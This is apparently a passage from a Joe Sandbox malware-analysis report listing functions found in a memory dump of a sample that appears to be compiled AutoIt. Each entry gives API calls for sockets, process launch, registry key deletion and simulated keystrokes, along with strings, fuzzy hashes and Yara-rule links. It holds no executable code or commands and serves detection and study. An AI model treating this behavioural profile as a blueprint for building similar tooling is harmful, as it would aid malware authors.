Opcode Fuzzy Hash: 1f5c0f74ec9bd15a66f02c4537e94d2f327a3459d168a69f67f75c9c0bea09bd
Instruction Fuzzy Hash: DCC19275A083019FC714EF24DD41A5AB7E4FF85320F00896DF8999B2A2DB74ED45EB42

Function 00F76B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F76C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F76C21
WSAGetLastError.WSOCK32(00000000), ref: 00F76C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00F76CEA
inet_ntoa.WSOCK32(?), ref: 00F76CA7

Part of subcall function 00F5A7E9: _strlen.LIBCMT ref: 00F5A7F3
Part of subcall function 00F5A7E9: _memmove.LIBCMT ref: 00F5A815

_strlen.LIBCMT ref: 00F76D44
_memmove.LIBCMT ref: 00F76DAD

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 4fab8d154afd4170cf01c6e664a33c6eccc13051744ab043008fc705e84f0481
Instruction ID: 55886b0d0d9b6103ddd0c91ecb2426487e22207981b733ba06faa26f226d4e89
Opcode Fuzzy Hash: 4fab8d154afd4170cf01c6e664a33c6eccc13051744ab043008fc705e84f0481
Instruction Fuzzy Hash: 9A81D271608700AFC710EB24CC81E6BB7A8AF84724F14891DF559DB2D2DA74DD05EB52

Function 00F01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392f81b93f73cb1a1462a6b2759a225af6961bb5d96766ed1106f35a3377a219
Instruction ID: 1e5562980aad451a56f924f006a7e0949a3a845650ac9be440ad0e5ddbf352d9
Opcode Fuzzy Hash: 392f81b93f73cb1a1462a6b2759a225af6961bb5d96766ed1106f35a3377a219
Instruction Fuzzy Hash: 02716F35900109EFCB14CF98CC89ABEBB75FF86324F248159F915AA291C734AA51EB60

Function 00F8B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(018B54C8), ref: 00F8B3EB
IsWindowEnabled.USER32(018B54C8), ref: 00F8B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F8B4DB
SendMessageW.USER32(018B54C8,000000B0,?,?), ref: 00F8B512
IsDlgButtonChecked.USER32(?,?), ref: 00F8B54F
GetWindowLongW.USER32(018B54C8,000000EC), ref: 00F8B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F8B589

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 652559afd2beae0ce68ac176c59e887253799c40903041fe97c41e6676c39a9a
Instruction ID: 1f1eae418a1d635627f9a0a6d8ddafe6dc3b8422654e97caa407c572c04c17c1
Opcode Fuzzy Hash: 652559afd2beae0ce68ac176c59e887253799c40903041fe97c41e6676c39a9a
Instruction Fuzzy Hash: 2371A034A00608EFDB20EF94C896FFA7BB5EF09320F144159F946972A2C735A980FB50

Function 00F7F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7F448
_memset.LIBCMT ref: 00F7F511
ShellExecuteExW.SHELL32(?), ref: 00F7F556

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

GetProcessId.KERNEL32(00000000), ref: 00F7F5CD
CloseHandle.KERNEL32(00000000), ref: 00F7F5FC

Strings

@, xrefs: 00F7F525

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 3301b29ba860a6171352e6970f95a4409f7b12d2483e295b71db5176bad3def2
Instruction ID: 607acaf87e1db74117a9d78ff2a76a0d693a207e7484197c17a4206a2c3894d9
Opcode Fuzzy Hash: 3301b29ba860a6171352e6970f95a4409f7b12d2483e295b71db5176bad3def2
Instruction Fuzzy Hash: CA61B1B1A00619DFCB04DF54C8819AEB7F5FF48320F54806AE859AB391DB34AD45EF91

Function 00F60F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00F60F8C
GetKeyboardState.USER32(?), ref: 00F60FA1
SetKeyboardState.USER32(?), ref: 00F61002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00F61030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00F61095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F610B8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
Instruction ID: b7a80be555aa8d59ce9c107201ba56cac7d1ab5dd75c8564103917981fa351e4
Opcode Fuzzy Hash: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
Instruction Fuzzy Hash: 185102A0A087D53DFB3642348C15BBBBEA9AB06314F0C8589E1D5868D3D6D9ECC8F751

Function 00F60D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00F60DA5
GetKeyboardState.USER32(?), ref: 00F60DBA
SetKeyboardState.USER32(?), ref: 00F60E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F60E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F60E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F60EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F60EC9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
Instruction ID: 5de3277be4b604cb7f5768c95fc0cad89c0c2cda4f2a4618777b8daee32348fb
Opcode Fuzzy Hash: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
Instruction Fuzzy Hash: B45126A09447D53DFB3283748C55BBB7FA9AB06310F1C8989E1D44A4C3DB96AC98F350

Function 00F655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00F6560A
_wcsncpy.LIBCMT ref: 00F6563F
_wcsncpy.LIBCMT ref: 00F65671
_wcsncpy.LIBCMT ref: 00F656A4
_wcsncpy.LIBCMT ref: 00F656E6
_wcsncpy.LIBCMT ref: 00F65720
_wcsncpy.LIBCMT ref: 00F6574F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 89296586db167c09f09cbf64bc40156f713618be7be130353b46cce7d02e881d
Instruction ID: d62a33a4e3ae6078c69c232dd6d35297ce375d190ae3ae157845d153e0767c21
Opcode Fuzzy Hash: 89296586db167c09f09cbf64bc40156f713618be7be130353b46cce7d02e881d
Instruction Fuzzy Hash: 5041B565C1062876CB11EBB4DC469CFB3B8DF04710F508956F519E3221FB38A385E7A6

Function 00F63671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F63697,?), ref: 00F6468B

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F63697,?), ref: 00F646A4

lstrcmpiW.KERNEL32(?,?), ref: 00F636B7
_wcscmp.LIBCMT ref: 00F636D3
MoveFileW.KERNEL32(?,?), ref: 00F636EB
_wcscat.LIBCMT ref: 00F63733
SHFileOperationW.SHELL32(?), ref: 00F6379F

Strings

\*.*, xrefs: 00F6372D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 96085bbe5ed9f3fb1eb75de73fbe1b40bfd0236aa5b49c9bbb01d704e0b8faeb
Instruction ID: a081b3c5f92d45efc4610af9fbdbf7606f39a2643350cb4eaab4b27cd26db671
Opcode Fuzzy Hash: 96085bbe5ed9f3fb1eb75de73fbe1b40bfd0236aa5b49c9bbb01d704e0b8faeb
Instruction Fuzzy Hash: CB419471508348AEC751EF64D8419EFB7E8EF89350F40082EF499C3251EB39D689EB52

Function 00F87291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F87351
IsMenu.USER32(?), ref: 00F87369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F873B1
DrawMenuBar.USER32 ref: 00F873C4

Strings

0, xrefs: 00F8729E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: ed3637f6fe4b7c85bad01d1a8c04878584d371d46de8b81b3ddb96abdd4a0a8f
Instruction ID: f7e8561afd2dc62d702270d01b00cc580499edc1330f585ca4006f71db96ced6
Opcode Fuzzy Hash: ed3637f6fe4b7c85bad01d1a8c04878584d371d46de8b81b3ddb96abdd4a0a8f
Instruction Fuzzy Hash: 8E410775A04309AFDB20EF50D884EEABBB4FB05360F248529FD159B260D730ED54EB51

Function 00F80FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F80FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F80FFE
FreeLibrary.KERNEL32(00000000), ref: 00F810B5

Part of subcall function 00F80FA5: RegCloseKey.ADVAPI32(?), ref: 00F8101B
Part of subcall function 00F80FA5: FreeLibrary.KERNEL32(?), ref: 00F8106D
Part of subcall function 00F80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F81090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F81058

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: e83caddb1fc471e4874541c39423157877d0fbfc22de5b691940312e700b298c
Instruction ID: d549f8c72acc98dbe7ed77ba4c9d8b2cc44c2f2b9849f635d60c55ee43bc4da5
Opcode Fuzzy Hash: e83caddb1fc471e4874541c39423157877d0fbfc22de5b691940312e700b298c
Instruction Fuzzy Hash: 7E310F71D01109BFDB159F90DC89EFFB7BCEF08310F104269E501E2151DA745E89ABA1

Function 00F862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F862EC
GetWindowLongW.USER32(018B54C8,000000F0), ref: 00F8631F
GetWindowLongW.USER32(018B54C8,000000F0), ref: 00F86354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F86386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F863DB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 70c57032cadf68ad997fe48666251828a9352655f20429e96586b37fefd1309a
Instruction ID: 265d73c84bfacf36c5d22876124fa1cffa5df8bada5e990b70faa6d16493b617
Opcode Fuzzy Hash: 70c57032cadf68ad997fe48666251828a9352655f20429e96586b37fefd1309a
Instruction Fuzzy Hash: 22311431A402549FEB21DF18DD85FA537E1FB4A724F1901A4F501DF2B1CB71A884AB51

Function 00F5DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DB54
SysAllocString.OLEAUT32(00000000), ref: 00F5DB57
SysAllocString.OLEAUT32(?), ref: 00F5DB75
SysFreeString.OLEAUT32(?), ref: 00F5DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00F5DBA3
SysAllocString.OLEAUT32(?), ref: 00F5DBB1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 00af1000515b69b2d37881b495e014ac428732225b7039a88a4187bbdbe86f43
Instruction ID: 68030ef59689ef985e009918ec6025c871d676f11d3db39e01fd804d947ba985
Opcode Fuzzy Hash: 00af1000515b69b2d37881b495e014ac428732225b7039a88a4187bbdbe86f43
Instruction Fuzzy Hash: 38219136A02219BF9F20DFA8DC88CBB73ADEB48360B118125FE14DB251D7709C49A760

Function 00F76173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F77DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F761C6
WSAGetLastError.WSOCK32(00000000), ref: 00F761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F7620E
connect.WSOCK32(00000000,?,00000010), ref: 00F76217
WSAGetLastError.WSOCK32 ref: 00F76221
closesocket.WSOCK32(00000000), ref: 00F7624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F76263

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 58b56be908c8e723b50ac9ec23ddd9498509a78207416ad77fe34decaf44a25f
Instruction ID: 711272a9d973c26729121a537e617d10b86f160ee306e0587bf47555dc9298fa
Opcode Fuzzy Hash: 58b56be908c8e723b50ac9ec23ddd9498509a78207416ad77fe34decaf44a25f
Instruction Fuzzy Hash: 4831A471600508AFDF10AF24CC85FBD7BA8EB45720F44806AFD09E7292DB74AD04EB62

Function 00F5F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F5F671
__wcsnicmp.LIBCMT ref: 00F5F692
__wcsnicmp.LIBCMT ref: 00F5F6AC

Strings

#notrayicon, xrefs: 00F5F669
#OnAutoItStartRegister, xrefs: 00F5F6A6
#requireadmin, xrefs: 00F5F68C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 92a4006f9a89cdf71fc75e56b738970aec294ef3e0b2883dd1cce1ee08771c16
Instruction ID: 672bdefb02b11cfd45429f0f6c79484a2308274cd1d97d49cc03a24422f85fd5
Opcode Fuzzy Hash: 92a4006f9a89cdf71fc75e56b738970aec294ef3e0b2883dd1cce1ee08771c16
Instruction Fuzzy Hash: CA2167B36045216AD720A634BC02FA773D8DF59321F114479FE41C6091EB589D8DF295

Function 00F5DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DC2F
SysAllocString.OLEAUT32(00000000), ref: 00F5DC32
SysAllocString.OLEAUT32 ref: 00F5DC53
SysFreeString.OLEAUT32 ref: 00F5DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00F5DC76
SysAllocString.OLEAUT32(?), ref: 00F5DC84

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: eb6d010803bba2c520b81b1c6de86bd4f43554debaaa9b5fe5f7f74aecd295e7
Instruction ID: 4353fdad5ff59100dd03b6a80b7b81f3fca30a9034306e1aff360fd289b9bd3a
Opcode Fuzzy Hash: eb6d010803bba2c520b81b1c6de86bd4f43554debaaa9b5fe5f7f74aecd295e7
Instruction Fuzzy Hash: D3218636605208AF9B20DFA8DC88DBB77ECEB08361B118125FE14CB261DA74DC49E764

Function 00F875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F87632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F8763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F8764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F87659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F87665

Strings

Msctls_Progress32, xrefs: 00F87603

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 48aced135b63eb9eae5074b460fd242ab190886348fdf5ebf3689429f54637b9
Instruction ID: 7847d9fca0d83093530628206afa50e398c9cc558b8828e41f53562035dab7f8
Opcode Fuzzy Hash: 48aced135b63eb9eae5074b460fd242ab190886348fdf5ebf3689429f54637b9
